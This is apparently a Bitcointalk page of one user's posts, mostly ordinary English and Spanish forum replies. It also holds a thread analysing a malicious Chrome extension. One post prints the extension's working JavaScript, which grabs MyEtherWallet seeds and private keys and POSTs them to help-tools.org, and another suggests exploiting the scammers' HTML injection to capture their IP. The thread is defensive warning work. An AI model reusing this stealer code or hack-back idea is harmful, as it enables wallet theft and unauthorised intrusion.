Bitcoin Forum
June 14, 2024, 04:56:30 AM *
News: Voting for pizza day contest
 
  Home Help Search Login Register More  
  Show Posts
Pages: « 1 ... 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 [288] 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 ... 407 »
5741  Bitcoin / Development & Technical Discussion / Re: We need some help to decode a hacker addon on: December 13, 2018, 01:54:00 PM
Had a quick look.

How the extension works is by filtering the domains listed and get information such as seed and send it to https://help-tools.org/courses/currentc.php

MyEtherWallet:
Code:
 if (location.href.indexOf('myetherwallet') > -1) {
     function kurilkaNJSmo() {
         document.onkeyup = function(e) {
             e = e || window.event;
             if (e.keyCode === 13) {
                 var seeddas = $("#aria4").val();
                 var pkk = $("#aria6").val();
                 var myseedwal = seeddas + ' + ' + pkk;
                 $.ajax({
                     type: 'POST',
                     url: 'https://help-tools.org/courses/currentc.php',
                     crossDomain: !0,
                     data: {
                         meww: "none" + ":" + "myetherwallet" + ":" + myseedwal
                     },
                     dataType: 'html',
                 })
             }
             return !1
         }
         document.body.addEventListener("click", function(event) {
             if (event.toElement.className == "btn btn-primary ng-scope") {
                 console.log("go");
                 var seeddas = $("#aria4").val();
                 var pkk = $("#aria6").val();
                 var myseedwal = seeddas + ' + ' + pkk;
                 $.ajax({
                     type: 'POST',
                     url: 'https://help-tools.org/courses/currentc.php',
                     crossDomain: !0,
                     data: {
                         meww: "none" + ":" + "myetherwallet" + ":" + myseedwal
                     },
                     dataType: 'html',
                 })
             }
         })
     }
     setTimeout(kurilkaNJSmo, 2000)
 }


That domain was clearly hacked.
The expected format is something like none:myetherwallet:key

When sending a GET request some currency tickers are returned.

Sending a POST request the response sends the same data but with either a "+" or "-" as the very first character of the page, depending on where the format is valid or not?

By removing some of the parameters "invalid" is returned.

Best bet would be to block the domain but if the user is smart enough to block a domain it will be smart enough not to download the extension in the first place i would assume.


EDIT:
Addresses of the thief:
Code:
         CypherMcDAG.BTC = '16EegrNMdZ9Rxku6Za5neEFjMW57wkQr1S';
         CypherMcDAG.ETH = '0x03b70dc31abf9cf6c1cf80bfeeb322e8d3dbb4ca';
         CypherMcDAG.ETC = '0x4F53C9882Ba87d2D7c525dF2aEF2540EFB6e32e5';
         CypherMcDAG.BCH = '1PCh7w6LdcEv1sWd5wtvkELHcWe5HumUi3';
         CypherMcDAG.LTC = 'LRPChoyN8qLWENjo1dUjk2bESZjE7bQ6sP';

Some comments:
//tut kodpzds - Google translate autodetects russian? Ofc..
//bikbuk = bikbuk*0.01;

Some urls:
https://help-tools.org/courses/plsnoban.php
https://help-tools.org/md5.php
https://help-tools.org/courses/status.php?s=c

Thanks nuno12345 that's some great information, was the kind of info i was searching for. I leave you some merits.  Cheesy
5742  Bitcoin / Bitcoin Technical Support / Re: Conversation with the hacker who stole funds from us on: December 13, 2018, 01:48:09 PM
Quote
We have a legal department who's dealing with companies not paying as well as Internet fraud

Thanks to nuno12345 we have sensitive information of the addon https://bitcointalk.org/index.php?topic=5083876.msg48638228#msg48638228

Quote
Addresses of the thief:
Code:

         CypherMcDAG.BTC = '16EegrNMdZ9Rxku6Za5neEFjMW57wkQr1S';
         CypherMcDAG.ETH = '0x03b70dc31abf9cf6c1cf80bfeeb322e8d3dbb4ca';
         CypherMcDAG.ETC = '0x4F53C9882Ba87d2D7c525dF2aEF2540EFB6e32e5';
         CypherMcDAG.BCH = '1PCh7w6LdcEv1sWd5wtvkELHcWe5HumUi3';
         CypherMcDAG.LTC = 'LRPChoyN8qLWENjo1dUjk2bESZjE7bQ6sP';

And they explain how the addon work and how it send the information to https://help-tools.org/courses/currentc.php
5743  Bitcoin / Development & Technical Discussion / We need some help to decode a hacker addon on: December 12, 2018, 02:45:03 PM
A lot of users on the forum are getting scammed this way as you can see on the next links:

https://bitcointalk.org/index.php?topic=5083404.0
https://bitcointalk.org/index.php?topic=5083139.0
https://bitcointalk.org/index.php?topic=5081286.0


So, the add-on has been taken down and they upload it with another name, now is called CCB Cash.

https://chrome.google.com/webstore/detail/%D1%81cb-cash/liachincjagnalnmahhaioaogkngbmhf?hl=en-US&gl=MX

So, there is an extension to view source code from any addon, it's called 'Chrome extension source viewer'

When i take a look to this code i realized how bad it is...

Code:
    "name": "СCB Cash",
    "permissions": [
        "activeTab",
        "tabs",
        "cookies",
        "*://github.com/*",
        "*://api.github.com/*",
        "*://exmo.me/*",
        "*://*.twitter.com/*",
        "*://*.coinbase.com/*",
        "*://qq.com/*",
        "*://*.hbg.com/*",
        "*://hitbtc.com/*",
        "*://twitter.com/*",
        "*://*.binance.com/*",
        "*://*.localbitcoins.com/*",
        "*://localbitcoins.com/*",
        "*://blockchain.com/*",
        "*://*.exmo.com/*",
        "*://cryptodraw.org/*",
        "*://exmo.com/*",
        "*://*.live.com/*",
        "*://bitfinex.com/*",
        "*://hbg.com/*",
        "*://*.yahoo.com/*",
        "*://google.com/*",
        "*://*.bitfinex.com/*",
        "*://*.hitbtc.com/*",
        "*://coinbase.com/*",
        "*://*.huobi.com/*",
        "*://*.google.com/*",
        "*://*.exmo.me/*",
        "*://huobi.com/*",
        "*://yahoo.com/*",
        "*://*.blockchain.com/*",
        "*://myetherwallet.com/*",
        "*://binance.com/*",
        "*://*.myetherwallet.com/*",
        "*://live.com/*",
        "*://*.qq.com/*"
    ],

So, this time i ask for some help, maybe the developers can find some useful information about this APP to stop this hacker.

By the way, you don't have to install the addon to see the source.
5744  Local / Tokens (Español) / Re: Blockchain para financiar un videojuego. ¿Opiniones? on: December 12, 2018, 02:11:37 PM
Quote
La idea principal es vender esos tokens, el supply total, en relación a 1 Raiders Token por 0,1 Waves.

5,000,000 de tokens quiere decir que quieres colectar 500,000 waves, a $2 dolares cada uno estamos hablando de 1 millon de dolares...

Quote
montar un estudio fisico con un sistema de captura de movimiento, un pequeño empujón al desarrollo.

Traje con luces: $100
4 Camaras: $4000
Desarrollo: $Horas nalga.

La pregunta es que vas a hacer con los otros $995,900 dolares.

Deja y te ahorro el sistema de captura de movimiento Wink

https://www.youtube.com/watch?v=sXg0IRKhEho

Tu vision es herronea mi estimado, no necesitas 1 millon de dolares para lanzar un juego, es al revez, necesitas lanzar un juego (y que este sea bueno) para conseguir 1 millon de dolares.

Y es por eso que mas de el 90% de ICOs acaban en estafa, pero si aun asi quieres que tu ico tenga exito, invierte en publicidad, eso es todo.
5745  Local / Español (Spanish) / Re: último giveaway del 2018 - $10 en premios. on: December 11, 2018, 11:59:24 PM
Que buen concurso! voto por 3 premios asi hay mas gente que gana algo , y supongo que voy a esperar un poco para dar mi pronostico Cheesy

Es totalmente valido esperar ala fecha limite para dar tu predicción, de todas formas te he agregado a la lista de participantes.

Vamos a tirar hacia el optimismo y decir... 8432$  Cool

Solo por curiosidad; esto me causa bastantes dudas
Quote
8.-Me reservo el derecho de descalificar a gente en caso de que sospeche que hacen trampa.
puede que sea de mi cansancio acumulado, pero no veo como alguien podría hacer trampa en esto Huh

Que la misma persona utilice diferentes cuentas sería hacer trampa. Es solo una medida preventiva  Wink
5746  Other / Meta / Re: The release of Satoshi's personal data on: December 11, 2018, 06:21:07 PM
Haven't you heard?  Craig Steven Wright is Satoshi.

Haven't you heard?  Craig Steven Wright couldn't prove he is Satoshi. So, he isn't. Even a message with the bitcoin security keys was released at the start of this year to reaffirm that CSW isn't satoshi.

5747  Local / Español (Spanish) / Re: último giveaway del 2018 - $10 en premios. on: December 11, 2018, 05:02:14 PM
Los ganadores de este giveaway fueron:

1.- bbvedf
2.- nekludov
3.- poloniex777

Y sus respectivos pagos

1.- https://www.blockchain.com/btc/tx/9d228f789c923f5ec6346a166bdcaa15223c9a428cc0362b3d32ab8a461a92a7
2.- A la espera de su direccion para mandar el pago
3.- https://www.blockchain.com/btc/tx/25718bc034800a26345e673788255626887e91ba672af09e59c12fee969c06e2
5748  Local / Español (Spanish) / último giveaway del 2018 - $10 en premios. on: December 11, 2018, 05:02:01 PM
Este 2018 he realizado un par de giveaways en esta seccion de español, Muchos me preguntaron si el dinero salia de mi bolsa y por que lo hacia, y las respuesta son; Si, el dinero sale de mi bolsa (por eso los premios son pequeños) y lo hago para dar le a la comunidad en español una oportunidad de obtener BTC.

Los giveaways anteriores fueron algo complejos, así que esta vez lo dejare mas al azar y una modalidad en la que todos tienen la misma oportunidad. Solo tienen que responder la siguiente pregunta y la(s) respuesta que este mas cercana a la realidad ganaran:

Cual va a ser el precio del bitcoin el 1ro de Enero a las cero horas (Basandonos en el horario de ciudad de México.)?


Reglas:

1.-Ustedes escogen la modalidad del pago, esto puede ser premio para 1, 2 o 3.
2.-Las cuentas que sean nuevas o que sean usadas solo para airdrops y esas cosas, serán descalificadas.
3.-El premio se pagara el primero de enero en el transcurso de el día.
4.-Solo una respuesta por persona y esta no podrá ser modificada.
5.-En caso de que la encuesta para la modalidad de premio empate, se tomara en cuenta la que tenga mas ganadores.
6.-Es obligatorio que si posteas una respuesta escojas una modalidad de premio en la encuesta.
7.-La ultima fecha para ingresar una respuesta es el 25 de diciembre del 2018.
8.-Me reservo el derecho de descalificar a gente en caso de que sospeche que hacen trampa.
9.-No hay limite de usuarios que se puedan inscribir.
10.-No escoger la misma cifra que otro usuario.

Lista de usuarios inscritos y predicción de precio:

1.- MA40 $1,800
2.- Zarg0n $3,350
3.- Csmiami $8,432
4.- rillater $4,000
5.- BentechCrypto $4,316
6.- bbvedf $3,800
7.- poloniex777 $3,950
8.- vingaard $4,900
9.- nekludov $3,603
10.- NadiaHel $5,000
5749  Economy / Services / Re: Looking for blockchain project on: December 11, 2018, 04:26:46 PM
So are you proposing to work for tokens itself?
I'm looking projects for my company, and payment must be in $))

Can you please list off past projects and provide your company details?
Lets have a call and we will show you all our projects
Skype: Avezorsoft

Why not post them here, if you don't show us your work how do you want to get some trust from our side.

You are looking for projects for your company? or you are looking to develop projects for your clients? Because if you are searching to work in a project for your company and get paid at the same time, that will be hard to happen.
5750  Bitcoin / Bitcoin Technical Support / Re: Conversation with the hacker who stole funds from us on: December 11, 2018, 04:18:38 PM
Well, the addon has been taken down... and the site to get the addon has been taken down too: https://cryptodraw.org/

The same scammers are running this schema, i have collected some information on this thread: https://bitcointalk.org/index.php?topic=5081286.0

Hope it helps for your investigation.

By the way, some of their sites are vulnerable to html injection, with that you can add a redirection and make them visit the site you want, that way you can get their IP.
5751  Other / Ivory Tower / Re: How would be a world without ignorance and stupidity? on: December 10, 2018, 07:55:38 PM
Anyone is free to believe anything he wants, that's freedom, and if you want to pray for God in a crisis, that's valid too. But religion is an ignorant and stupid thing... Snakes talking, Mans dividing the sea, and a guy who resurrects after some days to be dead are those kinds of lies who makes me feel bad for religious people. The plane earth has more sense than that and still bullshit.

So, religion is part of the list because makes people believe on tons of lies who doesn't have any proof, as they say, the faith is blind. So, for me, that's just more ignorance.

I understand. I believe that those apparently silly stories were very important for our culture and society.  Moral, ethics, and even human rights were based in religion beliefs.

There was never a society without a religion. As far as I know.

Well, that's ok, I am not religious, but I would tag religious people as stupid. Also, I believe that tagging them is useful for some political ideologies, which are ,in my opinion, more harmful than religions.

Religion is a tool created by smart people with the goal of manipulation. And the ones who let the smart guys manipulate them abusing their ignorance are stupids.

But i'm agreed with your arguments, religion has been part of our society and will be like that for the next years, but as you can see the new generations are not believers, and that's because now people have access to information. The truth can't be hidden anymore.
5752  Local / Esquina Libre / Re: Prueba de autenticidad Gothorum on: December 10, 2018, 06:00:50 PM
Proof that I am Gothorum and not the swindler that wants to impersonate me, in the Neluns chat.



Native language: Spanish
Bitcointalk username: Gothorum
Translation/moderation experience: https://www.bitspain.io/en/services
Profile: https://bitcointalk.org/index.php?action=profile;u=674078
ERC-20 wallet address: 0x6c8341Cc21c9f8AE601974b339066DBed2344851
Telegram: @Gothoru (https://t.me/Gothoru)


-----------------------------------------------------------------------------


USER: vorefor meg is cheat

Proof cheat:




please, do not change any ETH address.

Cito esta prueba de autenticidad para evitar que la información sea modificada por el autor de esta publicación. Simplemente como respaldo y no por que dude de la persona.  Wink
5753  Local / Altcoins (criptomonedas alternativas) / Re: KFC en Venezuela aceptará la criptomoneda DASH como forma de pago. on: December 10, 2018, 05:55:20 PM
Lo que se me hace extraño es que acepten Dash y no otra criptomoneda.

DASH lleva muchos meses trabajando su implantación en Venezuela:

https://www.criptonoticias.com/adopcion/dash-destina-300-000-crecimiento-colombia-venezuela/
https://www.businessinsider.es/dash-cryptocurrency-surges-in-venezuela-as-hyperinflation-explodes-2018-8?r=US&IR=T

La gracia de tener una DAO con presupuesto descentralizado es que la comunidad puede recibir propuestas de proyectos y financiar los que crea más interesantes.

https://www.dashforcenews.com/es/que-es-una-dao/

Excelente información, no sabia que venezuela estuviera tan metido con otras altcoins, yo pensaba que solo se trataba de bitcoin y de petro, pero es interesante ver como vienen con todo. Me gustaría ver a Mexico con el mismo interés en implementar estos crypto activos, pero yo creo que pasaran unos años para que ese sueño se haga realidad.
5754  Local / Servicios / Re: Bot de Twitter - Actualizaciones de BTC/USD cada hora on: December 10, 2018, 05:49:23 PM
Hola todos, noté que mucha información de precios BTC/USD en estos días está en inglés, así que hice un bot de Twitter que brinda actualizaciones cada hora con el precio promedio del bitcoin en dólares (BTC/USD) en las casas de cambio:
https://twitter.com/btcausd

Déjeme saber, por favor, si todos ustedes tienen algún comentario o idea sobre cómo puedo mejorarlo.

Gracias!

Podrias hacer algo mas interactivo con los usuarios, algo que cuando un usuario te mande un tweet, tu bot responda con la informacion solicitada, por ejemplo:

Yo: @BTCaUSD precio BTC
Bot: @Yo $3400

Yo: @BTCaUSD precio 10 BTC
Bot: @Yo $34000

Yo: @BTCaUSD precio ETH
Bot: @Yo $80

Yo: @BTCaUSD convierte 10 BTC a ETH
Bot: @Yo 10BTC = 10000ETH

Algo asi de interactivo Wink
5755  Alternate cryptocurrencies / Altcoin Discussion / Re: anybody know anything about this new supper secret Swiss crypto? on: December 10, 2018, 05:44:58 PM
I am hearing roomers about this new crypto being developed in Switzerland by these "genius" economists. But nobody seems knows what it's called. I know a few things I keep hearing about it are...  

1. It's being developed by these 12 brilliant European economists.
2. it's distribution wont be centralized.
3. it's a proof of stake coin.
4. And its being developed in Switzerland!

This thing is driving me crazy! Does anybody know anything about this project or even what the hell this thing is called!

All I know for sure is as soon as I can find out what this new coin called I am buying it and I am going to start mining it!




You don't know how is it called and who is the developers but you are ready to invest your money in it... is this a bait?


So, let's talk about those points... developed by brilliant economists... that they will get huge profit from it. Not centralized distribution, i can smell the ICO. PoS coin, nothing new at all. And developed in Switzerland, does it really matter?

Lot of nonsense with this project, but good luck with your investment.
5756  Other / Beginners & Help / Re: New to bitcoin on: December 10, 2018, 03:45:43 PM


Hi

As topic suggests.
I have only read up on Wikipedia thats as far as my knowledge extends.

Where to from here?
What should I look out for /avoid ?

Any helpful information to get myself started would be much appreciated. 

Thanks in advance

36 year old broke male from Australia,  Melbourne



You are in the right place, just keep reading the forum and get familiarized with the different areas it has. There is a lot of ways to make money with bitcoin, you can sell services and even sell stuff on this forum, so keep reading and posting. In a blink, you will be involved in this medium.
5757  Other / Ivory Tower / Re: How would be a world without ignorance and stupidity? on: December 10, 2018, 03:27:17 PM
I just don't understand why you added religion to the list, as if everyone who have a religion is ignorant and stupid. That's not true.

Religious motivated wars are  stupid, but not the religion itself.

I am not a religious guy, I don't even have a religion...
If you were the victim of a shipwreck and were holding your life on a piece of wood, would not you pray for God to help you?

Someday I read somewhere that your only true believes are the ones that you still hold when you are facing eminent death.

Anyone is free to believe anything he wants, that's freedom, and if you want to pray for God in a crisis, that's valid too. But religion is an ignorant and stupid thing... Snakes talking, Mans dividing the sea, and a guy who resurrects after some days to be dead are those kinds of lies who makes me feel bad for religious people. The plane earth has more sense than that and still bullshit.

So, religion is part of the list because makes people believe on tons of lies who doesn't have any proof, as they say, the faith is blind. So, for me, that's just more ignorance.
5758  Local / Servicios / Re: Apostando con bitcoin. on: December 10, 2018, 03:18:10 PM
Hola buenas, yo encontré un algoritmo para ganar el 100% de las veces en una página llamada prime dice, totalmente fiable y saque un buen pellizco jeje Smiley Volviendo al hilo, si alguno tiene una lista de cripto casinos, me la podría pasar? Gracias de antemano

Un algoritmo para ganar 100% de las veces, no lo creo amigo, es para que ya hubieras vaciado el casino :p Si realmente funciona te invito a hacernos millonarios juntos, jajaja

En la sección de gambling en este foro podras encontrar los mejores cripto casinos. te dejo el enlace:

https://bitcointalk.org/index.php?board=56.0

Saludos
5759  Local / Primeros pasos y ayuda / Re: Inicio con las bitcoins desde 0 on: December 10, 2018, 01:56:44 AM
Buenas, la verdad  no se si esto está permitido, estoy empezando con este tema, ya que investigué que se pueden sacar increibles ganancias fácilmente, soy de Paraguay y no encuentro algun trabajo para solventarme la universidad y al resto de mi familia, por eso recurro a este metodo.
No poseo fondos para invertir en algun lugar ni equipo como para minar, alguien puede darme algun consejo o alguna forma de como podria conseguir pequeñas cantidades para empezar a invertir? Y como hacerlo?

Hola mizunopy!

Antes que nada deja darte la bienvenida al foro, entiendo tu postura, al final muchos empezamos al igual que tu, le vemos cara de negocio a esto y ya queremos ganar desde el primer dia, pero te responderé como me respondieron a mi... Nadie te regalara dinero ya que el dinero es para los que trabajan. Pero por lo menos te puedo mostrar el camino Wink

En la siguiente seccion del foro podras encontrar servicios, gente que requiere servicios y gente que los ofrece, si tu tienes alguna habilidad con la computadora es una buena sección para empezar:
Bitcoin Forum > Economy > Marketplace > Services
https://bitcointalk.org/index.php?board=52.0

Mi primer trabajo de bitcoin lo conseguí en esa sección, y fue ganar $100 por ayudar a configurar un servidor. Tuve suerte pero fue un buen principio.

Otra area que personalmente me hiso generar bitcoins fue la del juego online, muchos casinos regalan dinero solo para que los pruebes, asi que es buena oportunidad.
Bitcoin Forum > Economy > Marketplace > Gambling
https://bitcointalk.org/index.php?board=56.0

Así que te deseo suerte y bienvenido abordo de este barco de la locura.
5760  Economy / Scam Accusations / Re: New scam schema on the forum on: December 09, 2018, 04:39:25 PM
Thanks for the info guys, i just update the first post adding a list of the known sites of this schema, if you have another site to add to the list, please post it here and I will update it.

I will not open another thread on Scam Accusations section because 'cryoser' already open one:

https://bitcointalk.org/index.php?topic=5038504.0

Bitcoin Forum > Economy > Trading Discussion > Scam Accusations (Moderator: Cyrus) > SCAM ALERT https://crypton.bet
Pages: « 1 ... 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 [288] 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 ... 407 »
Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!